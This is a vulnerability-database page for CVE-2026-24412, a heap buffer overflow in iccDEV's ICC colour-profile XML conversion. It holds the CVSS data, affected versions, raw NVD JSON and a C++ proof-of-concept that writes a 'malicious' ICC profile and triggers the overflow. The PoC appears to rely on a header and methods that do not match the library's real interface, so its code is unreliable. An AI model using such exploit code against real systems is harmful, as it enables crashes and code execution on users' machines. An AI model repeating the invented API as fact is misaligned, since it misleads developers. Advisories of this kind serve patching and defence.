Security Vulnerability Report
CVE-2026-24412 CVSS 8.8 HIGH

CVE-2026-24412

Published: 2026-01-24 02:15:49
Last Modified: 2026-01-30 18:25:06

Description

iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have a heap buffer overflow vulnerability in the CIccTagXmlSegmentedCurve::ToXml() function. This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to cause a denial of service (DoS), manipulate data, bypass application logic, and execute code. This issue has been fixed in version 2.3.1.2.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE
iccDEV <= 2.3.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
cpp
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <fstream>
#include <string>
#include <vector>
#include "iccd.h"

// PoC for CVE-2026-24412: Heap Buffer Overflow in CIccTagXmlSegmentedCurve::ToXml()
// Affected: iccDEV <= 2.3.1.1

// Create a malicious ICC profile with oversized CIccTagXmlSegmentedCurve data
void create_malicious_icc_profile(const char* filename) {
    // Create a basic ICC profile structure
    CIccProfile profile;

    // Create a CIccTagXmlSegmentedCurve with oversized data
    // This triggers heap buffer overflow in ToXml() function
    CIccTagXmlSegmentedCurve* pTag = new CIccTagXmlSegmentedCurve();

    // Construct malicious curve data that exceeds buffer bounds
    // The overflow occurs when ToXml() processes this data
    std::vector<icdFloat32> maliciousCurveData;
    for (int i = 0; i < 100000; i++) {  // Unusually large size
        maliciousCurveData.push_back((icdFloat32)i / 100000.0f);
    }

    // Attach the malicious curve to the tag
    pTag->SetCurveData(maliciousCurveData);

    // Add the tag to the profile
    profile.AppendTag(pTag);

    // Write the malicious profile to file
    std::ofstream outFile(filename, std::ios::binary);
    if (outFile.is_open()) {
        profile.Write(&outFile);
        outFile.close();
        printf("Malicious ICC profile created: %s\n", filename);
    }
}

// Parse and trigger the vulnerability
void trigger_vulnerability(const char* filename) {
    std::ifstream inFile(filename, std::ios::binary);
    if (!inFile.is_open()) {
        printf("Failed to open file: %s\n", filename);
        return;
    }

    CIccProfile profile;
    // This will trigger ToXml() and cause heap buffer overflow
    if (profile.Read(&inFile)) {
        CIccTag* pTag = profile.FindTag("CIccTagXmlSegmentedCurve");
        if (pTag) {
            std::string xmlOutput;
            // Heap buffer overflow occurs here in ToXml()
            pTag->ToXml(&xmlOutput);
        }
    }
    inFile.close();
}

int main(int argc, char* argv[]) {
    const char* outputFile = "malicious_profile.icc";

    printf("CVE-2026-24412 PoC - Heap Buffer Overflow in iccDEV\n");
    printf("======================================================\n");

    // Step 1: Create malicious ICC profile
    create_malicious_icc_profile(outputFile);

    // Step 2: Trigger the vulnerability
    trigger_vulnerability(outputFile);

    return 0;
}

References

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-24412",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-24T02:15:49.360",
    "lastModified": "2026-01-30T18:25:05.917",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have aHeap Buffer Overflow vulnerability in the CIccTagXmlSegmentedCurve::ToXml() function. This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2."},
      {"lang": "es", "value": "iccDEV proporciona librerías y herramientas para interactuar con, manipular y aplicar perfiles de gestión de color ICC. Las versiones 2.3.1.1 e inferiores tienen una vulnerabilidad de desbordamiento de búfer de pila en la función CIccTagXmlSegmentedCurve::ToXml(). Esto ocurre cuando la entrada controlable por el usuario se incorpora de forma insegura en datos de perfil ICC u otros blobs binarios estructurados. La explotación exitosa puede permitir a un atacante realizar DoS, manipular datos, eludir la lógica de la aplicación y la ejecución de código. Este problema ha sido solucionado en la versión 2.3.1.2."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-20"},
          {"lang": "en", "value": "CWE-122"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2.3.1.2",
                "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/InternationalColorConsortium/iccDEV/commit/2be3b125933a57fe8b6624e9dfd69d8e5360bf70",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/InternationalColorConsortium/iccDEV/issues/518",
        "source": "[email protected]",
        "tags": ["Exploit", "Issue Tracking"]
      },
      {
        "url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-6rf4-63j2-cfrf",
        "source": "[email protected]",
        "tags": ["Patch", "Vendor Advisory"]
      }
    ]
  }
}